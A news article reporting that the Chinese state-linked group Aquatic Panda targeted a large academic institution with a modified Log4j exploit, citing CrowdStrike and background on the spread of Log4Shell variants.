Chinese state-sponsored attackers targeted academic institution with modified Log4j exploit

Chinese state-sponsored hackers reportedly targeted a “large academic institution” with a modified version of the Log4j exploit, according to cyber security firm, CrowdStrike. This is the latest in a range of cyber exploits that attackers around the world are reported to have carried out by cashing in on the Log4j vulnerability in Apache internet databases. 

The Apache Log4j vulnerability, known as the Log4Shell cyber exploit, was a flaw in the Log4j website database logs. The latter, which has been estimated to have been used almost 30% of the websites across the world, has been projected as one of the world’s widest cyber security flaws -- ranking alongside the biggest cyber attacks in recent times. 

Also read: Half of investigated incidents in 2021 connected to ransomware: Kaspersky

“As OverWatch disrupted the attack before Aquatic Panda could take action on their objectives, their exact intent is unknown. This adversary, however, is known to use tools to maintain persistence in environments so they can gain access to intellectual property and other industrial trade secrets,” said Param Singh, vice president of CrowdStrike’s OverWatch team -- in an interview with VentureBeat. 

Aquatic Panda is the name used to refer to the alleged Chinese state sponsored cyber attackers. The group has reportedly been active since mid-2020, but has so far not been identified as a public operator such as the notorious Lazarus group of North Korea. 

Log4j exploits have steadily increased ever since the flaw was brought to light. The exploit has been used by numerous malware strains to exploit a wide range of vulnerabilities. A Check Point report revealed that variations of the original Log4j exploit have increased exponentially as days subsequent to the exploit went by. 

Also read: Three threats to enterprise security in 2022

This is why Google researchers have said it made Log4j more impactful. The researchers stated that the range of the exploit, coupled with multiple variations of it that would be developed by attackers, would mean that the overall blast radius of the Log4j vulnerability is rather difficult to be ascertained.